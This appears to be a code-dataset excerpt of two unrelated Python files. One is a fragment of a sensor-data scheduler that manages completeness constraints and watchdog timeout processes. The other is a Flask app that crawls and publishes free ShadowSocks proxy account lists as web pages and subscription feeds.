        print(datetime.datetime.now(), '| [Scheduler]:', 'Received data from:', key, ', at', arrival_time, ' with timestamp generated', time_generated)
        # check registered completeness constraints that are linked to received device data
        for constraint in self.constraints:
            if constraint.sameKey(key):
                print(datetime.datetime.now(), '| [Scheduler]:', 'ApplicationConstraint', constraint.getDeviceKey())
                process = self.constraint_to_process[constraint.getID()]
                if process != None:
                    # A watchdog was started by an earlier packet for this registration.
                    if process.is_alive():
                        # Packet beat the timeout: cancel the watchdog before re-arming below.
                        # NOTE(review): terminate() kills the process abruptly — confirm
                        # onTimeout holds no shared resources when this fires.
                        print(datetime.datetime.now(), '| [Scheduler]: packet received prior timeout. Terminating timeout Process.')
                        self.constraint_to_process[constraint.getID()].terminate()
                    # check if violation
                    if above_constraint[constraint.getCompleteness()] != None:
                        if above_constraint[constraint.getCompleteness()] < constraint.getThreshold():
                            # Achieved completeness fell below the registered threshold.
                            if constraint.getRemoteObject() != None:
                                print(datetime.datetime.now(),
                                      '| [Scheduler]: constraint violation detected. Invoking onViolation() on Updater.')
                                self.updater.onViolation(constraint.getRemoteObject(), value, achieved_completeness_constraints[constraint.getCompleteness()], next_timeout[constraint.getCompleteness()], timestamp)
                            else:
                                print(datetime.datetime.now(),
                                      '| [Scheduler]: constraint violation detected. Invoking onViolation() on Publisher.')
                                self.publisher.onViolation(constraint.getID(), key, value, achieved_completeness_constraints[constraint.getCompleteness()], next_timeout[constraint.getCompleteness()], timestamp)
                        else:
                            if constraint.getRemoteObject() != None:
                                print(datetime.datetime.now(),
                                      '| [Scheduler]: constraint satisfaction. Invoking onNext() on Updater.')
                                self.updater.onNext(constraint.getRemoteObject(), value, achieved_completeness_constraints[constraint.getCompleteness()],next_timeout[constraint.getCompleteness()], timestamp)
                            else:
                                print(datetime.datetime.now(),
                                      '| [Scheduler]: constraint satisfaction. Invoking onNext() on Publisher.')
                                self.publisher.onNext(constraint.getID(), key, value, achieved_completeness_constraints[constraint.getCompleteness()], next_timeout[constraint.getCompleteness()], timestamp)
                    else:
                        # No achieved-completeness figure for this constraint;
                        # presumably treated as satisfaction — confirm intent.
                        if constraint.getRemoteObject() != None:
                            print(datetime.datetime.now(),
                                  '| [Scheduler]: constraint satisfaction. Invoking onNext() on Updater.')
                            self.updater.onNext(constraint.getRemoteObject(), value,
                                                achieved_completeness_constraints[constraint.getCompleteness()],
                                                next_timeout[constraint.getCompleteness()], timestamp)
                        else:
                            print(datetime.datetime.now(),
                                  '| [Scheduler]: constraint satisfaction. Invoking onNext() on Publisher.')
                            self.publisher.onNext(constraint.getID(), key, value,
                                                  achieved_completeness_constraints[constraint.getCompleteness()],
                                                  next_timeout[constraint.getCompleteness()], timestamp)
                else:
                    # First packet for this registration: no watchdog process exists yet.
                    if constraint.getRemoteObject() != None:
                        print(datetime.datetime.now(),
                              '| [Scheduler]: constraint satisfaction. Invoking onNext() on Updater.')
                        print('next timeout',next_timeout[constraint.getCompleteness()])
                        self.updater.onNext(constraint.getRemoteObject(), value,
                                            achieved_completeness_constraints[constraint.getCompleteness()],
                                            next_timeout[constraint.getCompleteness()], timestamp)
                    else:
                        print(datetime.datetime.now(),
                              '| [Scheduler]: constraint satisfaction. Invoking onNext() on Publisher.')
                        self.publisher.onNext(constraint.getID(), key, value,
                                              achieved_completeness_constraints[constraint.getCompleteness()], next_timeout[constraint.getCompleteness()], timestamp)
                completeness = constraint.getCompleteness()
                # Re-arm: start a fresh watchdog with the newly computed timeout.
                print(datetime.datetime.now(), '| [Scheduler]: Initiating new timeout Process with a timeout of', next_timeout[completeness], 'seconds.')
                p = Process(target=onTimeout, args=(constraint, next_timeout[completeness],
                                                    self.updater, self.publisher, self.network_monitor, above_constraint))
                self.constraint_to_process[constraint.getID()] = p
                p.start()
        # check registered static timeouts that are linked to received device data
        for st in self.timeouts:
            if st.sameKey(key):
                print(datetime.datetime.now(), '| [Scheduler]:', 'StaticTimeout', st.getDeviceKey())
                process = self.timeout_to_process[st.getID()]
                if process != None:
                    # if timeout hasn't occured yet, stop timer and call on_next
                    if process.is_alive():
                        print(datetime.datetime.now(), '| [Scheduler]: packet received prior timeout. Terminating timeout Process.')
                        self.timeout_to_process[st.getID()].terminate()
                    if st.getRemoteObject() != None:
                        print(datetime.datetime.now(), '| [Scheduler]: Invoking onNext() on Updater.')
                        self.updater.onNext(st.getRemoteObject(), value,
                                            achieved_completeness_timeouts[st.getTimeout()],
                                            float(st.getTimeout()), timestamp)
                    else:
                        print(datetime.datetime.now(), '| [Scheduler]: Invoking onNext() on Publisher.')
                        self.publisher.onNext(st.getID(), key, value,
                                              achieved_completeness_timeouts[st.getTimeout()], float(st.getTimeout()), timestamp)
                else:
                    # first packet arrival, no process yet
                    if st.getRemoteObject()!=None:
                        print(datetime.datetime.now(), '| [Scheduler]: Invoking onNext() on Updater.')
                        self.updater.onNext(st.getRemoteObject(), value,
                                            achieved_completeness_timeouts[st.getTimeout()],
                                            float(st.getTimeout()), timestamp)
                    else:
                        print(datetime.datetime.now(), '| [Scheduler]: Invoking onNext() on Publisher.')
                        self.publisher.onNext(st.getID(), key, value,
                                              achieved_completeness_timeouts[st.getTimeout()], float(st.getTimeout()),timestamp)
                # Re-arm the static watchdog for the next expected packet.
                print(datetime.datetime.now(), '| [Scheduler]: Initiating new timeout Process with a timeout of', st.getTimeout(), 'seconds.')
                p = Process(target=onTimeout, args=(st, float(st.getTimeout()), self.updater, self.publisher, self.network_monitor))
                self.timeout_to_process[st.getID()] = p
                p.start()
|
views.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import random
import logging
import time
import threading
import os
from ssshare import app
from ssshare.ascii import birthday_2017, ss_title
from ssshare.ss import crawler
from ssshare import donation
from flask import render_template, send_from_directory, abort
from apscheduler.schedulers.background import BackgroundScheduler
# Config for disqus comment board
# Config for disqus comment board
DOMAIN = 'http://ss.pythonic.life'
DISQUS_IDENTIFIER = 'shadowsocksshare'
# Placeholder served until the first crawl completes (user-facing Chinese
# message: "don't worry, crawling data, come back in ten minutes").
servers = [{'data': [], 'info': {'message': '别着急,正在爬数据,十分钟后再回来吧:)', 'url': 'http://ss.pythonic.life', 'name': '免费 ShadowSocks 账号分享'}}]
# Process start time; rendered on pages and not reassigned by update_servers().
curtime = time.ctime()
# base64 subscription payloads and raw JSON config lists; all five globals
# below are rebuilt by update_servers().
encoded = ''
full_encoded = ''
jsons = list()
full_jsons = list()
scheduler = BackgroundScheduler()
def update_servers():
    """Crawl fresh server lists and rebuild the subscription payloads.

    Rebuilds the module-level ``servers``, ``jsons``, ``full_jsons``,
    ``encoded`` and ``full_encoded`` globals.  Runs once from the startup
    thread and periodically from the APScheduler cron job (see ``start()``).

    Fixes: ``full_jsons`` is now rebuilt each run (it previously only ever
    appended, accumulating duplicates), and the trailing ``time.sleep(7200)``
    was removed — it pinned the scheduler's worker for two hours per run,
    causing overlapping job instances to be skipped.
    """
    global servers, encoded, full_encoded, jsons, full_jsons
    try:
        new_servers = crawler.main()
        active_uris, active_jsons = [], []
        all_uris, all_jsons = [], []
        for website in new_servers:
            for server in website['data']:
                all_uris.append(server['ssr_uri'])
                all_jsons.append(server['json'])
                # status > 0: presumably servers that passed the crawler's
                # validity check — confirm against crawler.main().
                if server['status'] > 0:
                    active_uris.append(server['ssr_uri'])
                    active_jsons.append(server['json'])
        # Publish the new state only after the crawl succeeded, so a failed
        # run leaves the previous (still usable) data in place.
        servers = new_servers
        jsons = active_jsons
        full_jsons = all_jsons
        encoded = base64.urlsafe_b64encode(bytes('\n'.join(active_uris), 'utf-8'))
        full_encoded = base64.urlsafe_b64encode(bytes('\n'.join(all_uris), 'utf-8'))
    except Exception as e:
        # Best-effort refresh: log and keep serving the old data.
        logging.exception(e, stack_info=True)
# Page-view counter.  The default 'memory' backend keeps the count in this
# process; any other value for counter_path is treated as a file path that
# persists the count across restarts.
counter_path = 'memory'
count = 0
def counter(counter_path=counter_path, update=True):
    """Return the page-view count, first incrementing it when ``update`` is true.

    In file mode the value *read from the file* is returned, so the stored
    file stays one ahead of the returned count (preserved behavior).

    Fix: file handles are now closed via ``with`` blocks instead of being
    leaked by bare ``open(...).write``/``.readline()`` calls.
    """
    global count
    if update:
        if counter_path == 'memory':
            count += 1
        else:
            directory = os.path.split(counter_path)[0]
            if not os.path.exists(directory):
                os.makedirs(directory)
            if not os.path.exists(counter_path):
                # Seed the persistent counter on first use.
                with open(counter_path, 'w') as f:
                    f.write('0')
            with open(counter_path) as f:
                count = int(f.readline())
            with open(counter_path, 'w') as f:
                f.write(str(count + 1))
    return count
@app.route('/')
def index():
    """Render the landing page listing only validated servers."""
    try:
        return render_template(
            'index.html',
            servers=servers,
            ss=random.choice(ss_title),  # random ASCII-art title banner
            counter=counter(),
            ctime=curtime,
            PAGE_URL=DOMAIN + '/',
            PAGE_IDENTIFIER='shadowsocksshare'
        )
    except Exception as e:
        # Log and fall through; Flask turns the None return into a 500.
        logging.exception(e, stack_info=True)
@app.route('/full')
def full():
    """Render the page listing every crawled server, validated or not."""
    try:
        return render_template(
            'full.html',
            servers=servers,
            ss=random.choice(ss_title),  # random ASCII-art title banner
            counter=counter(),
            ctime=curtime,
        )
    except Exception as e:
        # Log and fall through; Flask turns the None return into a 500.
        logging.exception(e, stack_info=True)
@app.route('/<string:path>')
def pages(path):
    """Render the detail page for one server, addressed as ``<site>-<index>``.

    Fixes: removed the leftover ``print(path)`` debug statement and hoisted
    the fourteen repeated ``servers[a]['data'][b]`` chained lookups into a
    single ``entry`` variable.
    """
    try:
        a, b = path.split('-')
        a, b = int(a), int(b)
    except Exception:
        # Anything that is not exactly two dash-separated integers is a 404.
        abort(404)
    if a >= len(servers):
        abort(404)
    elif b >= len(servers[a]['data']):
        abort(404)
    try:
        entry = servers[a]['data'][b]
        return render_template(
            'pages.html',
            uri=entry.get('decoded_url', ''),
            server=entry.get('server', 'None'),
            server_port=entry.get('server_port', 'None'),
            password=entry.get('password', 'None'),
            method=entry.get('method', 'None'),
            ssr_protocol=entry.get('ssr_protocol', 'None'),
            obfs=entry.get('obfs', 'None'),
            href=entry.get('href', 'None'),
            remarks=entry.get('remarks', 'None'),
            counter=counter(),
            server_data=entry,
            json=entry.get('json', 'None'),
            obfsparam=entry.get('obfsparam', 'None'),
            protoparam=entry.get('protoparam', 'None'),
            status=entry.get('status', 'None'),
            content=entry.get('content', 'None'),
        )
    except Exception as e:
        # Log and fall through; Flask turns the None return into a 500.
        logging.exception(e, stack_info=True)
@app.route('/html/<path:path>')
def static_html(path):
    """Render an arbitrary template under /html/; unknown templates give 404.

    NOTE(review): ``path`` comes straight from the URL — confirm Jinja's
    loader confines lookups to the template folder.
    """
    try:
        page = render_template(path)
    except Exception as e:
        logging.exception(e)
        abort(404)
    return page
@app.route('/donation')
def html_donation():
    """Render the donation page from the static donation data module."""
    try:
        context = {
            'data': donation.data,
            'sum_people': donation.sum_people,
            'sum_money': donation.sum_money,
        }
        return render_template('donate.html', **context)
    except Exception as e:
        logging.exception(e)
        abort(404)
@app.route('/subscribe')
def subscribe():
    """Serve the base64 subscription of validated servers."""
    # Read-only counter call: presumably subscription fetches are deliberately
    # not counted as page views — confirm.
    counter('', False)
    return encoded
@app.route('/full/subscribe')
def full_subscribe():
    """Serve the base64 subscription of every crawled server."""
    # Read-only counter call: subscription fetches are not counted as views.
    counter('', False)
    return full_encoded
@app.route('/json')
def subscribe_json():
    """Return one random validated server config as JSON text."""
    counter('', False)
    if not jsons:
        return '{}'
    return random.sample(jsons, 1)[0]
@app.route('/full/json')
def full_subscribe_json():
    """Return one random server config (validated or not) as JSON text.

    Fix: the emptiness guard previously checked ``jsons`` but sampled from
    ``full_jsons`` — a copy-paste bug that could raise ValueError (sampling
    from an empty list) or wrongly return '{}' when only one list was empty.
    """
    counter('', False)
    return '{}' if len(full_jsons) == 0 else random.sample(full_jsons, 1)[0]
@app.route('/js/<path:path>')
def send_jsadfsadfs(path):
    """Serve a file from the bundled 'js' directory."""
    return send_from_directory('js', path)
@app.route('/static/<path:path>')
def send_static(path):
    """Serve a file from the bundled 'static' directory."""
    return send_from_directory('static', path)
@app.route('/favicon.ico')
def send_favicon():
    """Serve the site favicon from the 'static' directory."""
    return send_from_directory('static', 'favicon.ico')
@app.errorhandler(404)
def page_not_found(e):
    """Render the custom 404 page together with the 404 status code."""
    return render_template('404.html'), 404
@app.route('/gift')
def gift():
    """Serve the 2017 birthday ASCII-art easter egg."""
    return birthday_2017
def start():
    """Run the first crawl immediately and schedule periodic refreshes."""
    # One-off background crawl so the site has data soon after boot.
    first_crawl = threading.Thread(target=update_servers)
    # Hourly refresh at a randomized minute/second — presumably to spread
    # crawl load across deployed instances; confirm.
    scheduler.add_job(update_servers, "cron", minute=random.randint(1, 15), second=random.randint(0, 59))
    first_crawl.start()
    scheduler.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.